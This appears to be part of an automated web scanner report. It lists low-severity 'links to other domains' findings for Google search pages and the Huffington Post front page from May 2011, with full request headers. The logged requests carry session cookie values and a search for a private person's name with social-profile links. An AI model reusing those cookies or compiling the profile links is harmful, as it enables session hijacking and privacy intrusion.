http://justjaredjr.buzznet.com/2009/12/14/jordan-pruitt-sings-christmas-carols-by-candlelight/
http://markmail.org/message/5wmsv36cbmj52zkm
http://webcache.googleusercontent.com/search?q=cache:20exXcfehgMJ:www.facebook.com/people/Alexander-Bucky-Jordan/1242845259+Bucky+A+Jordan&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:42vLm4Ss1RAJ:www.scgolf.org/tournaments/2011/majors/srfourballaccepted.shtml+Bucky+A+Jordan&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:5PrC1rN5hc0J:markmail.org/message/5wmsv36cbmj52zkm+Bucky+A+Jordan&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:WQN5FNq5ctEJ:www.famegame.com/people/Jordan_Bucky+Bucky+A+Jordan&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ccKIO6Fyz5gJ:www.mylife.com/melvinbuckyjordan+Bucky+A+Jordan&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:iS4bqymh6rMJ:www.facebook.com/people/Bucky-Jordan/100000824820783+Bucky+A+Jordan&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:nzUV3ZppvDMJ:justjaredjr.buzznet.com/2009/12/14/jordan-pruitt-sings-christmas-carols-by-candlelight/+Bucky+A+Jordan&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:tZjlH2n9wKEJ:www.myspace.com/buckstar61+Bucky+A+Jordan&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:wV5wS-n5DVIJ:controlshift.aol.com/careers+Bucky+A+Jordan&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259
http://www.facebook.com/people/Bucky-Jordan/100000824820783
http://www.famegame.com/people/Jordan_Bucky
http://www.mylife.com/melvinbuckyjordan
http://www.myspace.com/buckstar61
http://www.scgolf.org/tournaments/2011/majors/srfourballaccepted.shtml
http://www.youtube.com/results?q=Bucky+A+Jordan&um=1&ie=UTF-8&sa=N&hl=en&tab=w1
http://www.youtube.com/watch?v=EHH9BAvpgvU

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Bucky+A+Jordan HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:45:52 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/rU20-FBA.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 84171

<!doctype html> <head> <title>Bucky A Jordan - Google Search</title> <script>window.google={kEI:"YA_CTavYJIXUgQeEwdG4Dg",kEXPI:"17259,24472,25907,27147,28505,28514,28766,28887,29481,29509,29681
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=Bucky+A+Jordan&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/people/Bucky-Jordan/100000824820783" class=l onmousedown="return clk(this.href,'','','','1','','0CBkQFjAA')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:iS4bqymh6rMJ:www.facebook.com/people/Bucky-Jordan/100000824820783+Bucky+A+Jordan&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','1','','0CB4QIDAA')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.facebook.com/people/Alexander-Bucky-Jordan/1242845259" class=l onmousedown="return clk(this.href,'','','','2','','0CB8QFjAB')">Alexander <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:20exXcfehgMJ:www.facebook.com/people/Alexander-Bucky-Jordan/1242845259+Bucky+A+Jordan&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','2','','0CCQQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.myspace.com/buckstar61" class=l onmousedown="return clk(this.href,'','','','3','','0CCYQFjAC')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:tZjlH2n9wKEJ:www.myspace.com/buckstar61+Bucky+A+Jordan&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','3','','0CCsQIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.scgolf.org/tournaments/2011/majors/srfourballaccepted.shtml" class=l onmousedown="return clk(this.href,'','','','4','','0CC0QFjAD')">Senior Four Ball Championship</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:42vLm4Ss1RAJ:www.scgolf.org/tournaments/2011/majors/srfourballaccepted.shtml+Bucky+A+Jordan&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','4','','0CDIQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://controlshift.aol.com/careers" class=l onmousedown="return clk(this.href,'','','','5','','0CDMQFjAE')">control shift : It's All About the Experience : AOL Design Blog</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:wV5wS-n5DVIJ:controlshift.aol.com/careers+Bucky+A+Jordan&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','5','','0CDgQIDAE')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://justjaredjr.buzznet.com/2009/12/14/jordan-pruitt-sings-christmas-carols-by-candlelight/" class=l onmousedown="return clk(this.href,'','','','6','','0CDoQFjAF')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nzUV3ZppvDMJ:justjaredjr.buzznet.com/2009/12/14/jordan-pruitt-sings-christmas-carols-by-candlelight/+Bucky+A+Jordan&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','6','','0CD8QIDAF')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://markmail.org/message/5wmsv36cbmj52zkm" class=l onmousedown="return clk(this.href,'','','','7','','0CEAQFjAG')">Software Engineer, Lumeta Corporation, Somerset NJ - <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:5PrC1rN5hc0J:markmail.org/message/5wmsv36cbmj52zkm+Bucky+A+Jordan&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','7','','0CEUQIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.famegame.com/people/Jordan_Bucky" class=l onmousedown="return clk(this.href,'','','','8','','0CEYQFjAH')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:WQN5FNq5ctEJ:www.famegame.com/people/Jordan_Bucky+Bucky+A+Jordan&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','8','','0CEsQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.mylife.com/melvinbuckyjordan" class=l onmousedown="return clk(this.href,'','','','9','','0CE0QFjAI')">Melvin <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:ccKIO6Fyz5gJ:www.mylife.com/melvinbuckyjordan+Bucky+A+Jordan&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return clk(this.href,'','','','9','','0CFIQIDAI')">Cached</a>
...[SNIP]...
<h3 class=r><a href="http://www.youtube.com/watch?v=EHH9BAvpgvU" class=l onmousedown="return clk(this.href,'','1185006370796700405','','10','','0CFMQtwIwCQ')">Dance Wit Me/ By <em>
...[SNIP]...

16.82. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=7&ved=0CEEQFjAG&url=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783&ei=aA_CTeT0DcTTgQe937i0Dg&usg=AFQjCNGok1iKDISUUQCJ9SwqmC59QUUOgQ

The response contains the following link to another domain:

http://www.facebook.com/people/Bucky-Jordan/100000824820783

Request

GET /url?sa=t&source=web&cd=7&ved=0CEEQFjAG&url=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783&ei=aA_CTeT0DcTTgQe937i0Dg&usg=AFQjCNGok1iKDISUUQCJ9SwqmC59QUUOgQ HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/people/Bucky-Jordan/100000824820783
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 05 May 2011 02:50:57 GMT
Server: gws
Content-Length: 256
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.facebook.com/people/Bucky-Jordan/100000824820783">here</A>
...[SNIP]...

16.83. http://www.google.com/url previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/url

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/url?sa=t&source=web&cd=1&ved=0CBkQFjAA&url=http%3A%2F%2Fcontrolshift.aol.com%2Fcareers&ei=aA_CTeT0DcTTgQe937i0Dg&usg=AFQjCNHVqxamBeAZki9HHAluDul0ksF_Rg

The response contains the following link to another domain:

http://controlshift.aol.com/careers

Request

GET /url?sa=t&source=web&cd=1&ved=0CBkQFjAA&url=http%3A%2F%2Fcontrolshift.aol.com%2Fcareers&ei=aA_CTeT0DcTTgQe937i0Dg&usg=AFQjCNHVqxamBeAZki9HHAluDul0ksF_Rg HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 302 Found
Location: http://controlshift.aol.com/careers
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Thu, 05 May 2011 02:51:48 GMT
Server: gws
Content-Length: 232
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://controlshift.aol.com/careers">here</A>
...[SNIP]...

16.84. http://www.google.com/webhp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/webhp

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/webhp?sourceid=chrome-instant&ie=UTF-8&ion=1&nord=1

The response contains the following link to another domain:

http://www.youtube.com/?ie=UTF-8&hl=en&tab=w1

Request

GET /webhp?sourceid=chrome-instant&ie=UTF-8&ion=1&nord=1 HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
X-Purpose: : preview
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=Ba0U4da8P8fQA7x45DtUHYILglZeYGIGups8rg_DvVz_eZJte3UjlHF5LBgdHRELPDWgg_M2c4cfEuCb_MKRBOuEFsxKD3DPCgbNnbLWJ4NjJXl0O-Jy3456noCUlqNv

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 02:01:08 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 39643

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google</title><script>window.google={kEI:"5ATCTbjcDcjUgAfTnpDMDg",kEXPI:"17259,24472,27147,28505,28
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qsj(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/?ie=UTF-8&hl=en&tab=w1">YouTube</a>
...[SNIP]...

16.85. http://www.huffingtonpost.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.huffingtonpost.com
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://www.huffingtonpost.com/?icid=navbar_huffpo_main5

The response contains the following links to other domains:

http://abcnews.go.com/
http://ads.pubmatic.com/AdServer/js/universalpixel.js
http://americablog.blogspot.com/
http://andrewsullivan.theatlantic.com/
http://aol.com/video/930944537001
http://appworld.blackberry.com/webstore/content/19143
http://b.scorecardresearch.com/p?c1=2&c2=6723616&c3=&c4=&c5=front&c6=&c15=&cj=1
http://bloggingheads.tv/
http://blogs.abcnews.com/george/
http://blogs.reuters.com/felix-salmon/
http://blogs.suntimes.com/sweet/
http://boingboing.net/
http://bravenewfilms.org/
http://dailycaller.com/
http://dailykos.com/
http://democracyarsenal.org/
http://digbysblog.blogspot.com/
http://drudgereport.com/
http://english.aljazeera.net/
http://firedoglake.com/
http://fivethirtyeight.blogs.nytimes.com/
http://hotlineblog.nationaljournal.com/
http://i.huffpost.com/gen/273980/thumbs/r-BARACK-OBAMA-OSAMA-BIN-LADEN-huge.jpg
http://krugman.blogs.nytimes.com/
http://m.huffpost.com/
http://mediamatters.org/blog/
http://money.cnn.com/magazines/fortune/
http://moviefone.com/
http://music.aol.com/
http://news.aol.com/
http://news.bbc.co.uk/
http://news.ft.com/home/us
http://news.google.com/
http://news.independent.co.uk/
http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/
http://news.yahoo.com/
http://nydailynews.com/
http://o.aolcdn.com/ads/adsWrapper.js
http://online.wsj.com/public/page/peggy-noonan.html
http://pixel.quantserve.com/pixel/p-6fTutip1SMLM2.gif?labels=Home
http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js
http://politicalwire.com/
http://realestate.aol.com/blog/2011/05/02/real-estate-tough-sell-the-too-custom-home/
http://redstate.com/
http://reporting.sunlightfoundation.com/blog/
http://rollingstone.com/
http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/
http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&v46755
http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&v46770
http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007
http://s.huffpost.com/assets/js.php?f=v.js&v47014
http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js
http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg
http://s.huffpost.com/images/blank.gif
http://s.huffpost.com/images/facebook_promo_connect.png?3
http://s.huffpost.com/images/hoton_twitter3.png
http://s.huffpost.com/images/loader.gif
http://s.huffpost.com/images/modal/close-home.gif
http://s.huffpost.com/images/quickview/gear_animation.gif
http://s.huffpost.com/images/social-profile/lightbox/huffpo_logo_lightbox_beta.png
http://s.huffpost.com/images/v/blog_column.png
http://s.huffpost.com/images/v/logos/aol_cobrand/homepage.png
http://s.huffpost.com/images/v/something_to_say_button.png
http://s.huffpost.com/images/webslice12x12.png
http://secure-us.imrworldwide.com/cgi-bin/m?ci=us-703240h&cg=0&cc=1&ts=noscript
http://sixapart.com/
http://slate.msn.com/?id=3944&cp=68090&nav=navom
http://talkleft.com/
http://techcrunch.com/
http://television.aol.com/
http://thehill.com/
http://themoderatevoice.com/
http://time-blog.com/swampland/
http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/davidbrooks/index.html
http://translogic.aolautos.com/
http://vertical-stats.huffpost.com/?-1&&
http://video.aol.com/
http://wsj.com/
http://www.accesshollywood.com/
http://www.autoblog.com/
http://www.bagnewsnotes.com/
http://www.bloomberg.com/
http://www.boston.com/news/globe/
http://www.buzzfeed.com/
http://www.buzzmachine.com/
http://www.c-span.org/
http://www.cbsnews.com/
http://www.chicagotribune.com/
http://www.cnn.com/
http://www.comicsalliance.com/
http://www.cq.com/
http://www.crooksandliars.com/
http://www.csmonitor.com/
http://www.davidcorn.com/
http://www.democracynow.org/
http://www.engadget.com/
http://www.eonline.com/
http://www.ew.com/
http://www.forbes.com/
http://www.foxnews.com/
http://www.frumforum.com/
http://www.funnyordie.com/
http://www.games.com/
http://www.globalpost.com/
http://www.globalvoicesonline.org/
http://www.gothamist.com/
http://www.guardian.co.uk/
http://www.hitchensweb.com/
http://www.instapundit.com/
http://www.joystiq.com/
http://www.juancole.com/
http://www.kcrw.com/news/programs/lr
http://www.kitchendaily.com/
http://www.kottke.org/
http://www.latimes.com/
http://www.linktv.org/mosaic/
http://www.mapquest.com/
http://www.marketwatch.com/News/Story/Story.aspx?column=Jon+Friedman%27s+Media+Web&siteid=mktw&dist=
http://www.mcclatchydc.com/
http://www.mediaite.com/
http://www.mmafighting.com/
http://www.motherjones.com/
http://www.msnbc.msn.com/
http://www.nationaljournal.com/columns/political-connections
http://www.nationalreview.com/lowry/lowry.asp/
http://www.nationalreview.com/thecorner/corner.asp
http://www.ndnblog.com/
http://www.newser.com/off-the-grid/author/16/michael-wolff.html
http://www.newsweek.com/
http://www.newsweek.com/blogs/kausfiles.html
http://www.npr.org/
http://www.nydailynews.com/topics/Stanley+Crouch
http://www.nytimes.com/
http://www.nytimes.com/2011/05/04/us/politics/04torture.html
http://www.observer.com/
http://www.observer.com/opinions_conason.asp
http://www.opinionjournal.com/diary/
http://www.pandagon.net/
http://www.patch.com/
http://www.pbs.org/newshour/
http://www.people.com/people
http://www.politico.com/
http://www.popeater.com/
http://www.propublica.org/
http://www.prospect.org/weblog/
http://www.publicintegrity.org/
http://www.rawstory.com/
http://www.reuters.com/
http://www.reuters.com/subjects/bin-laden-compound
http://www.rollcall.com/
http://www.salon.com/
http://www.seeingtheforest.com/
http://www.sfgate.com/
http://www.shelterpop.com/
http://www.slate.com/
http://www.slate.com/blogs/blogs/weigel/
http://www.stylelist.com/
http://www.suntimes.com/
http://www.talkingpointsmemo.com/
http://www.taylormarsh.com/
http://www.techcrunch.com/
http://www.telegraph.co.uk/
http://www.thatminoritything.com/
http://www.theatlantic.com/
http://www.theatlantic.com/james-fallows/
http://www.theatlantic.com/joshua-green/
http://www.thedailybeast.com/author/howard-kurtz/
http://www.theglobeandmail.com/
http://www.thenation.com/authors/eric-alterman
http://www.thenation.com/blogs/notion
http://www.thenation.com/blogs/thebeat
http://www.theroot.com/
http://www.theyoungturks.com/
http://www.thinkprogress.org/
http://www.thismodernworld.com/
http://www.time.com/time/?xid=huffpo-direct
http://www.timesonline.co.uk/section/0,,3,00.html
http://www.tmz.com/
http://www.truthdig.com/
http://www.tuaw.com/
http://www.usatoday.com/
http://www.usnews.com/usnews/politics/whispers/whisphome.htm
http://www.vanityfair.com/
http://www.vanityfair.com/online/wolcott
http://www.washingtonindependent.com/
http://www.washingtonmonthly.com/
http://www.washingtonpost.com/
http://www.washingtonpost.com/wp-dyn/content/linkset/2005/03/24/LI2005032402294.html
http://www.washingtonpost.com/wp-dyn/content/linkset/2005/04/22/LI2005042201099.html
http://www.washingtontimes.com/
http://www.wonkette.com/
http://www.youthradio.org/

Request

GET /?icid=navbar_huffpo_main5 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: huffpost_influence_null=%7B%22commented%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22blogged%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22shared%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22emailed%22%3A%7B%22value%22%3A0%2C%22check_date%22%3A1304575102000%7D%2C%22bages%22%3Anull%7D; __utmz=265287574.1304575105.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-822287727-1304575116403; is_aol_user=1; huffpost_adssale=n; UNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; CUNAUTHID=1.f49ac58470c911e0ba8373d1f2b58312.0903; huffpo_type_views=%7B%2215%22%3A1%7D; __qseg=Q_D|Q_T|Q_2689|Q_2687|Q_2685|Q_1908|Q_1905|Q_1592|Q_683|Q_680|Q_679|Q_678|Q_666|Q_665|Q_657; __utma=265287574.457433518.1304575105.1304575105.1304575105.1; __utmc=265287574; __utmv=265287574.|3=User=A=1,4=JoinedOn=0=1,; __utmb=265287574.14.9.1304575182212; s_pers=%20s_getnr%3D1304575182214-New%7C1367647182214%3B%20s_nrgvo%3DNew%7C1367647182216%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolhuffpo%252Caolsvc%253D%252526pid%25253Dhpo%25252520%2525253A%25252520Osama%25252520Bin%25252520Laden%25252520Pictures%25252520Will%25252520Not%25252520Be%25252520Released%2525252C%25252520Obama%25252520Decides%25252520%25252528UPDATED%25252529%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.huffingtonpost.com/2011/05/02/holocaust-memorial-day_n_856638.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=28
Date: Thu, 05 May 2011 01:45:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" />

       <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&v46755" type="text/css" media="screen" />

<link rel="alternate" type="application/rss+xml" title="The Full Feed" href="http://feeds.huffingtonpost.com/huffingtonpost/raw_feed" />
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&v47014"></script>


<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
